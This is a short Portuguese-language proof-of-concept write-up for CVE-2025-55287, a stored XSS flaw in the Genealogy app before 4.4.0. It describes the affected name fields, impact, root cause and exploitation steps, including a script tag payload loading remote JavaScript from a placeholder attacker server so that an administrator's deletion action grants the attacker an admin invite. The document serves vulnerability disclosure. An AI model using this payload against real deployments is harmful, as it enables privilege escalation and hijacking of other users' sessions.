CVE-2025-55287-POC
Cross-Site Scripting (XSS) Armazenado e Autenticado no aplicativo Genealogy anterior à versão 4.4.0 permite execução arbitrária de JavaScript e escalada de privilégio do papel Editor+ para Administrador.
Sumário
- Tipo de vulnerabilidade: Cross-Site Scripting (XSS) Armazenado (CWE-79)
- Componente afetado: primeiro nome e sobrenome de 'Person'
- Versões afetadas: Todas as versões anteriores à 4.4.0
- Impacto: Execução persistente de JavaScript fornecido pelo atacante nos navegadores das vítimas; sequestro de sessão, CSRF via DOM, redesenho de UI, roubo de credenciais ou ações arbitrárias como a vítima
- Vetor de ataque: Autenticado (qualquer papel com criação de nova pessoa - editor+)
Exploração
Causa raiz: Sanitização/codificação inadequada no lado do servidor do primeiro nome/sobrenome das pessoas ao excluir com sucesso a pessoa afetada por um usuário com privilégios mais altos.
PoC:
- Autentique-se no aplicativo (papel editor+).
- Crie uma nova pessoa (não precisa necessariamente ser atribuída a nenhuma família).
- Inclua o JavaScript como primeiro nome ou sobrenome da pessoa adicionada:
<script src='yourserver/poc.js'></script>
- Edite o poc.js com seu endereço de e-mail no espaço reservado.
- Assim que um usuário privilegiado tentar excluir a pessoa recém-adicionada, você receberá um convite para a plataforma no endereço de e-mail fornecido com o papel de Administrador.